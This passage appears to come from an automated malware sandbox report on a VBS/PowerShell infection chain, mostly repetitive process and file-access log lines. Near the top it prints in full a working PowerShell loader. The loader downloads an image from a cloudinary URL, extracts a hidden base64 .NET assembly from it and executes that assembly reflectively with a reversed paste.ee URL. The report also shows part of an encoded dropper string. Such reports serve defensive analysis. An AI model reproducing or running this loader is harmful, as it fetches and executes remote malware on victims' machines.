taWN0aGluZ3NhcmVnb2luZ2Fyb3VuZHdpdGhodXNiYW5kd2l0aGdvb2RuZXdzZ3JlYXRmb3JldmVyeWJvZHlnaXZlbi50SUYiLCIkZU5WOkFQUERBVEFcZWNvbm9taWN0aGluZ3NhcmVnb2luZ2Fyb3VuZHdpdGhodXNiYW5kd2l0aGdvb2RuZS52YnMiLDAsMCk7U3RBclQtU0xlRVAoMyk7aW5Wb0tFLUVYcHJlU3NJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxlY29ub21pY3RoaW5nc2FyZWdvaW5nYXJvdW5kd2l0aGh1c2JhbmR3aXRoZ29vZG5lLnZicyI='+[ChaR]0x22+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$antisiphonal = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg ';$orlage = New-Object System.Net.WebClient;$centralised = $orlage.DownloadData($antisiphonal);$slanshacks = [System.Text.Encoding]::UTF8.GetString($centralised);$commends = '<<BASE64_START>>';$Lemaitre = '<<BASE64_END>>';$ependymis = $slanshacks.IndexOf($commends);$transcolation = $slanshacks.IndexOf($Lemaitre);$ependymis -ge 0 -and $transcolation -gt $ependymis;$ependymis += $commends.Length;$scribblage = $transcolation - $ependymis;$dorsolumbar = $slanshacks.Substring($ependymis, $scribblage);$keltologist = -join ($dorsolumbar.ToCharArray() \| ForEach-Object { $_ })[-1..-($dorsolumbar.Length)];$carinately = [System.Convert]::FromBase64String($keltologist);$brite = [System.Reflection.Assembly]::Load($carinately);$helygia = [dnlib.IO.Home].GetMethod('VAI');$helygia.Invoke($null, @('0/qvVum/r/ee.etsap//:sptth', 'creance', 'creance', 'creance', 'CasPol', 'creance', 'creance','creance','creance','creance','creance','creance','1','creance','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\e0waei52\e0waei52.cmdline"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\e0waei52\e0waei52.cmdline"			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_009D69DB push ds; retf 0007h	3_2_009D69EA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_009D42D9 push ebx; ret	3_2_009D42DA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_009D6A07 push ds; retf 0007h	3_2_009D6A0A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_009D56E2 pushad ; ret	3_2_009D5701
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_07091F40 push eax; iretd	3_2_07092341
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_07091B86 push es; retf	3_2_07091B88
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_034316AA push ss; retf	7_2_034316AB
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_0343E5A5 push eax; retf	7_2_0343E5A9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_03432D7A pushfd ; retf	7_2_03432D89
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_03432D9A pushfd ; retf	7_2_03432D89

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

File created: C:\Users\user\AppData\Local\Temp\e0waei52\e0waei52.dll

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
